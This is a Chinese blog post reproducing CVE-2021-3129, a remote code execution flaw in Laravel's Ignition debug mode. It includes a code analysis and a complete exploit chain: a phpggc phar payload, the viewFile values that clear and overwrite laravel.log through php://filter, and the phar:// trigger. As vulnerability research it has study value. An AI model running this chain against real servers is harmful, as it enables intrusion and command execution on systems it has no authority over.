<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-flash.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="漏洞研究,">





  <link rel="alternate" href="/atom.xml" title="Tyaoo's Blog" type="application/atom+xml">






<meta name="description" content="CVE-2021-3129 Laravel &amp;lt;= 8.4.2 Ignition &amp;lt;= 2.5.1">
<meta name="keywords" content="漏洞研究">
<meta property="og:type" content="article">
<meta property="og:title" content="Laravel Debug mode RCE复现">
<meta property="og:url" content="https://tyaoo.github.io/2021/05/28/Laravel-Debug-mode-RCE复现/index.html">
<meta property="og:site_name" content="Tyaoo&#39;s Blog">
<meta property="og:description" content="CVE-2021-3129 Laravel &amp;lt;= 8.4.2 Ignition &amp;lt;= 2.5.1">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/202105281210fa90afa0a5cfb6e9438b.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/202105281211e62811b5bb60e97317a9.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/202105281052e3a43478f71ec9e13073.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/2021052811469e4b69a8d859b25c0a80.png">
<meta property="og:updated_time" content="2021-05-28T07:05:32.002Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Laravel Debug mode RCE复现">
<meta name="twitter:description" content="CVE-2021-3129 Laravel &amp;lt;= 8.4.2 Ignition &amp;lt;= 2.5.1">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/202105281210fa90afa0a5cfb6e9438b.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://tyaoo.github.io/2021/05/28/Laravel-Debug-mode-RCE复现/">





  <title>Laravel Debug mode RCE复现 | Tyaoo's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Tyaoo's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://tyaoo.github.io/2021/05/28/Laravel-Debug-mode-RCE复现/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Tyaoo">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Tyaoo's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Laravel Debug mode RCE复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-05-28T14:15:46+08:00">
                2021-05-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p>CVE-2021-3129</p>
<p>Laravel &lt;= 8.4.2</p>
<p>Ignition &lt;= 2.5.1</p>
</blockquote>
<a id="more"></a>

<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><blockquote>
<p>在kali2020下复现</p>
</blockquote>
<pre><code class="cmd">git clone https://github.com/laravel/laravel.git    # 下载laravel源码
cd laravel                                            # 切换到laravel目录
git checkout -b e849812                              # 切换到存在漏洞的分支
composer update                                        # 更新composer
composer install                                       # composer安装依赖
composer require facade/ignition==2.5.1                # 下载存在漏洞版本组件
mv .env.example .env                                # 更改.env文件
php artisan key:generate                             # 生成Application key
php artisan serve                                    # 启动服务器</code></pre>
<p> 创建<code>resource/views/hello.blade.php</code>模板</p>
<pre><code class="html">&lt;html&gt;
    &lt;body&gt;
        &lt;h1&gt;hello, {{ $username }}&lt;/h1&gt;
    &lt;/body&gt;
&lt;/html&gt;</code></pre>
<p> 在<code>routes/web.php</code>中添加路由</p>
<pre><code class="php">Route::get(&#39;/hello&#39;, function () {
    return view(&#39;hello&#39;);
});</code></pre>
<h2 id="漏洞原因"><a href="#漏洞原因" class="headerlink" title="漏洞原因"></a>漏洞原因</h2><p>在修正未定义变量时存在一处<code>file_get_contents()</code>和一处<code>file_put_contents()</code>函数的第一参数可控，且在laravel中我们可以往log文件插入部分可控内容，且我们对log文件具有可写权限，导致我们可以通过把log文件覆写为phar文件，再通过phar反序列化实现命令执行</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><h3 id="调用栈分析"><a href="#调用栈分析" class="headerlink" title="调用栈分析"></a>调用栈分析</h3><p>访问新添加的路由<code>/laravel/public/hello</code>会抛出变量名未定义的错误，出现了一个按钮并提示按样例修改模板</p>
<img src="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/202105281210fa90afa0a5cfb6e9438b.png" alt="image-20210525133932073" style="zoom: 67%;">

<p>点击<code>Make variable optional</code>按钮并抓包，发生漏洞的接口就是在<code>/laravel/public/_ignition/execute-solution</code>这里，可以看到这里传入了<code>viewFile</code>参数对文件进行操作</p>
<p><img src="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/202105281211e62811b5bb60e97317a9.png" alt="image-20210525141459623"></p>
<p>通过在源码搜索<code>execute-solution</code>可以搜索到Web接口，可以看到<code>ExecuteSolutionController</code>类对象被当成函数调用，所以最终会触发其<code>__invoke()</code>函数</p>
<pre><code class="php">namespace Facade\Ignition;
class IgnitionServiceProvider extends ServiceProvider
{
    Route::post(&#39;execute-solution&#39;, ExecuteSolutionController::class) // 调用__invoke()函数
        -&gt;middleware(IgnitionConfigValueEnabled::class.&#39;:enableRunnableSolutions&#39;)
        -&gt;name(&#39;executeSolution&#39;);</code></pre>
<p>我们跟进一下它的<code>__invoke()</code>函数，第一步是初始化变量，第二部就是处理参数</p>
<pre><code class="php">namespace Facade\Ignition\Http\Controllers;
class ExecuteSolutionController
{

    public function __invoke(
        ExecuteSolutionRequest $request,
        SolutionProviderRepository $solutionProviderRepository
    ) {
        $solution = $request-&gt;getRunnableSolution();

        $solution-&gt;run($request-&gt;get(&#39;parameters&#39;, [])); // 跟进参数处理函数

        return response(&#39;&#39;);
    }
}</code></pre>
<p>根据<code>run()</code>函数，我们看到了<code>file_put_contents()</code>函数的第一个参数可控，我们还得跟进一下<code>makeOptional()</code>函数</p>
<pre><code class="php">namespace Facade\Ignition\Solutions;
class MakeViewVariableOptionalSolution implements RunnableSolution
{
    public function run(array $parameters = [])
    {
        $output = $this-&gt;makeOptional($parameters);
        if ($output !== false) {
            file_put_contents($parameters[&#39;viewFile&#39;], $output); // file_put_contents()的第一参数可控
        }
    }</code></pre>
<p>在这里我们又看到了<code>file_get_contents()</code>函数第一个参数可控，后面就是修正操作，即为模板中的未定义变量添加一个判断条件</p>
<pre><code class="php">namespace Facade\Ignition\Solutions;
class MakeViewVariableOptionalSolution implements RunnableSolution
{
    public function makeOptional(array $parameters = [])
    {
        $originalContents = file_get_contents($parameters[&#39;viewFile&#39;]); // file_get_contents()的第一参数可控
        $newContents = str_replace(&#39;$&#39;.$parameters[&#39;variableName&#39;], &#39;$&#39;.$parameters[&#39;variableName&#39;].&quot; ?? &#39;&#39;&quot;, $originalContents);

        $originalTokens = token_get_all(Blade::compileString($originalContents));
        $newTokens = token_get_all(Blade::compileString($newContents));

        $expectedTokens = $this-&gt;generateExpectedTokens($originalTokens, $parameters[&#39;variableName&#39;]);

        if ($expectedTokens !== $newTokens) {
            return false;
        }

        return $newContents;
    }</code></pre>
<p>所以我们可以把上面的代码浓缩为下面两行，简称先读后写</p>
<blockquote>
<p>应该有好些不知名CMS都有这么写过</p>
</blockquote>
<pre><code class="php">$output = file_get_contents($parameters[&#39;viewFile&#39;]);
file_put_contents($parameters[&#39;viewFile&#39;], $output);</code></pre>
<h3 id="日志部分可控"><a href="#日志部分可控" class="headerlink" title="日志部分可控"></a>日志部分可控</h3><p>另外，我们可以对laravel的日志文件插入部分可控内容，默认目录是<code>storage/logs/laravel.log</code></p>
<p>比如当我们传入</p>
<pre><code class="php">viewFile: This is the controlled part</code></pre>
<p>我们可以发现<code>laravel.log</code>文件中出现了报错信息，其中有两处<code>This is the controlled part</code>字段，同时还有一处带省略号的（提前警告这是个坑）</p>
<pre><code>[2021-05-27 13:08:30] local.ERROR: file_get_contents(This is the controlled part): failed to open stream: No such file or directory {&quot;exception&quot;:&quot;[object] (ErrorException(code: 0): file_get_contents(This is the controlled part): failed to open stream: No such file or directory at xxxxxx\\laravel\\vendor\\facade\\ignition\\src\\Solutions\\MakeViewVariableOptionalSolution.php:75)
[stacktrace]
#0 [internal function]: Illuminate\\Foundation\\Bootstrap\\HandleExceptions-&gt;handleError(2, &#39;file_get_conten...&#39;, &#39;xxxxxx...&#39;, 75, Array)
#1 xxxxxx\\laravel\\vendor\\facade\\ignition\\src\\Solutions\\MakeViewVariableOptionalSolution.php(75): file_get_contents(&#39;This is control...&#39;)</code></pre><p>它的大体结构如下面所示</p>
<pre><code>[label1] payload [label2] payload [label3]</code></pre><h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h3><blockquote>
<p>官方文档：<a href="https://www.php.net/manual/zh/filters.php" target="_blank" rel="noopener">https://www.php.net/manual/zh/filters.php</a></p>
</blockquote>
<p>所以我们的核心问题变成了如何向log文件写入一个合法的phar文件，这里我们需要利用到强大的<code>php://filter</code>，我们可以利用特别的编码和解码方法来对我们插入的内容进行修改</p>
<p><strong>清空文件</strong></p>
<p>第一个思路是我们可以用base64在解码时会自动丢弃无效字符的方法进行清空，所以按理来说只要我们多次对内容进行base64解码，那么最终就会把所有字符丢弃</p>
<pre><code>php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=../storage/logs/laravel.log</code></pre><p>但是如果文本当中出现<code>&#39;=&#39;</code>字符，<code>base64-decode</code>会抛出错误导致写入失败</p>
<p>所以<strong>@CHARLES FOL</strong>使用到的是php内置的官方文档未提及的<code>consumed</code>过滤器，可以直接返回空</p>
<pre><code>php://filter/read=consumed/resource=../storage/logs/laravel.log</code></pre><p>自己尝试了一下如果服务器的php支持<code>zlib</code>或者<code>bzip2</code>的话，也可以利用解压失败返回空的性质进行清空</p>
<pre><code>php://filter/read=zlib.inflate/resource=../storage/logs/laravel.log
php://filter/read=bzip2.decompress/resource=../storage/logs/laravel.log</code></pre><p><strong>写入payload</strong></p>
<p>在<code>php://filter</code>中有一个很好用的转换过滤器<code>iconv.utf16le.utf-8</code>，它能够把<code>UTF-16</code>字符转化为<code>UTF-8</code>字符，样例如下：</p>
<pre><code class="shell">echo -ne &#39;[Some prefix ]P\0A\0Y\0L\0O\0A\0D\0[midfix]P\0A\0Y\0L\0O\0A\0D\0[Some suffix ]&#39; &gt; /tmp/test.txt</code></pre>
<pre><code class="shell">php -r &quot;echo file_get_contents(&#39;php://filter/read=convert.iconv.utf16le.utf-8/resource=/tmp/test.txt&#39;);&quot;
# 卛浯⁥牰晥硩崠PAYLOAD浛摩楦嵸PAYLOAD卛浯⁥畳晦硩崠</code></pre>
<p>既可以传入我们完整的payload，又可以让其他正常字符转为无效字符，之后我们直接base64-decode即可写入payload</p>
<p>为了只留下一个payload字段，我们可以在payload的末尾添加一个byte的字符进行干扰即可，如：</p>
<pre><code class="shell">echo -ne &#39;[Some prefix ]P\0A\0Y\0L\0O\0A\0D\0X[midfix]P\0A\0Y\0L\0O\0A\0D\0X[Some suffix ]&#39; &gt; /tmp/test.txt</code></pre>
<pre><code class="shell">php -r &quot;echo file_get_contents(&#39;php://filter/read=convert.iconv.utf16le.utf-8/resource=/tmp/test.txt&#39;);&quot;
# 卛浯⁥牰晥硩崠PAYLOAD存業晤硩偝䄀夀䰀伀䄀䐀堀卛浯⁥畳晦硩崠</code></pre>
<p>相应的限制条件是：</p>
<ol>
<li>保证第一个payload字段前面的字符串长度是<code>2*n bytes</code>，不然无法解码出payload</li>
<li>保证整个字符串的总体长度是<code>2*n bytes</code>，不然会抛出以下错误<code>file_get_contents(): iconv stream filter (&quot;utf16le&quot;=&gt;&quot;utf-8&quot;): invalid multibyte sequence</code></li>
</ol>
<p>解决方案：</p>
<ol>
<li>因为日志文件部分内容可控，我们可以把前面的内容刚好填充到<code>2*n bytes</code></li>
<li>可以用同一种方法，也可以选择把payload复写两次</li>
</ol>
<p><strong>写入0字节</strong></p>
<p>最后一个问题就是我们无法向日志写入<code>\0</code>字节，这时候我们又可以用到一个转换过滤器<code>convert.quoted-printable-decode</code></p>
<blockquote>
<p><strong>官方说明</strong></p>
<pre><code class="c">quoted_printable_decode ( string $str ) : string</code></pre>
<p>该函数返回 quoted-printable 解码之后的 8-bit 字符串 (参考 <a href="http://www.faqs.org/rfcs/rfc2045" target="_blank" rel="noopener">» RFC2045</a> 的6.7章节，而不是 <a href="http://www.faqs.org/rfcs/rfc2821" target="_blank" rel="noopener">» RFC2821</a> 的4.5.2章节)</p>
<p><strong>格式</strong></p>
<p>(General 8bit representation) Any octet, except a CR or LF that is part of a CRLF line break of the canonical (standard) form of the data being encoded, may be represented by an “=” followed by a two digit hexadecimal representation of the octet’s value.  The digits of the hexadecimal alphabet, for this purpose, are “0123456789ABCDEF”.  Uppercase letters must be used; lowercase letters are not allowed.  Thus, for example, the decimal value 12 (US-ASCII form feed) can be represented by “=0C”, and the decimal value 61 (US- ASCII EQUAL SIGN) can be represented by “=3D”.  This rule must be followed except when the following rules allow an alternative encoding.</p>
</blockquote>
<p>简单来说就是将格式为<code>&quot;=&lt;hex&gt;&quot;</code>的字符串转发为对应ascii的字符串，所以我们可以将空字节编码为<code>&quot;=00&quot;</code>传入</p>
<p>所以最终我们写入payload方法为</p>
<pre><code>php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log</code></pre><p><strong>生成payload</strong></p>
<p>payload的生成我们可以反序列化工具<code>phpggc</code></p>
<blockquote>
<p><a href="https://github.com/ambionics/phpggc" target="_blank" rel="noopener">https://github.com/ambionics/phpggc</a></p>
</blockquote>
<pre><code class="shell">php -d &#39;phar.readonly=0&#39; ./phpggc monolog/rce1 system id --phar phar -o php://output | base64 -w0 | sed -E &#39;s/=+$//g&#39; | sed -E &#39;s/./\0=00/g&#39;</code></pre>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><pre><code class="shell"># 使用phpggc创建payload，注意这里最后添加了一个&#39;=00&#39;，用来屏蔽第二处payload回显
php -d &#39;phar.readonly=0&#39; ./phpggc monolog/rce1 system id --phar phar -o php://output | base64 -w0 | python -c &quot;import sys;print(&#39;&#39;.join([&#39;=&#39; + hex(ord(i))[2:].zfill(2) + &#39;=00&#39; for i in sys.stdin.read()]).upper() + &#39;=00&#39;)&quot;
# 清空log文件
viewFile: php://filter/read=consumed/resource=../storage/logs/laravel.log
# 传入字符使文本对齐，这里可传入任意文本
viewFile: tyao
# 传入payload
viewFile: =50=00=44=00=39=00=77=00=61=00=48=00...
# 解码payload
viewFile: php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log
# phar反序列化
viewFile: phar://../storage/logs/laravel.log</code></pre>
<h2 id="坑点"><a href="#坑点" class="headerlink" title="坑点"></a>坑点</h2><ol>
<li><p>如果传入的是形如<code>P=00D=009=00w=00...</code>的payload，倒数第二部有可能会产生<code>quoted-printable-decode</code>解码错误，原因如下，有一处省略的地方出现了<code>&quot;=0.&quot;</code>字符串导致解码失败，解决方法是将首字符<code>&#39;P&#39;</code>也进行编码就可以对齐了，懒人方法就是将所有字符进行编码 : &gt;</p>
<p><img src="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/202105281052e3a43478f71ec9e13073.png" alt="image-20210528024447449"></p>
</li>
<li><p>windows下复现失败了，因为是只要在base64的payload中存在<code>&#39;=&#39;</code>时，使用<code>convert.base64-decode</code>过滤器会报错返回空</p>
</li>
<li><p>针对第二种情况，我们将payload的命令进行填充至无<code>&#39;=&#39;</code>出现，但是phar协议反序列化时会报phar文件签名错误，大概率是因为<code>phpggc</code>只能在Linux下使用</p>
<pre><code>failed to open stream: phar &amp;quot;xxxx\\laravel\\storage\\logs\\laravel.log&amp;quot; has a broken signature&quot;</code></pre></li>
<li><p>如果想要在windows复现估计得重新写一个序列化，为了不麻烦自己，还是在跑去虚拟机复现成功了</p>
</li>
</ol>
<img src="https://raw.githubusercontent.com/Tyaoo/PicBed/master/img/PicGo-Github-PicBed/2021052811469e4b69a8d859b25c0a80.png" alt="image-20210528114607301" style="zoom:67%;">

<ol start="5">
<li>失败的建议多打几次</li>
</ol>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://zhuanlan.zhihu.com/p/351363561" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/351363561</a></p>
<p><a href="https://anquan.baidu.com/article/1286" target="_blank" rel="noopener">https://anquan.baidu.com/article/1286</a></p>
<p><a href="https://www.ambionics.io/blog/laravel-debug-rce" target="_blank" rel="noopener">https://www.ambionics.io/blog/laravel-debug-rce</a></p>

      
    </div>
    
    
    

    <div>
      
        <div>
    
    
</div>
      
    </div>

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/漏洞研究/" rel="tag"># 漏洞研究</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/05/25/FastJson反序列化漏洞研究/" rel="next" title="Fastjson反序列化漏洞研究">
                <i class="fa fa-chevron-left"></i> Fastjson反序列化漏洞研究
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/06/03/Yii2最新反序列化POP链分析/" rel="prev" title="Yii2最新反序列化POP链分析">
                Yii2最新反序列化POP链分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Tyaoo">
            
              <p class="site-author-name" itemprop="name">Tyaoo</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">32</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Tyaoo" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#环境搭建"><span class="nav-number">1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞原因"><span class="nav-number">2.</span> <span class="nav-text">漏洞原因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析"><span class="nav-number">3.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#调用栈分析"><span class="nav-number">3.1.</span> <span class="nav-text">调用栈分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#日志部分可控"><span class="nav-number">3.2.</span> <span class="nav-text">日志部分可控</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-filter"><span class="nav-number">3.3.</span> <span class="nav-text">php://filter</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞利用"><span class="nav-number">4.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#坑点"><span class="nav-number">5.</span> <span class="nav-text">坑点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">6.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Tyaoo</span>

  
</div>

<!--
  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>
-->





<!-- Highlight.js -->
<link rel="stylesheet" href="//cdn.bootcss.com/highlight.js/9.2.0/styles/github.min.css">
<script src="//cdn.bootcss.com/highlight.js/9.2.0/highlight.min.js">
</script>
<script>
    hljs.initHighlightingOnLoad();
</script>


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
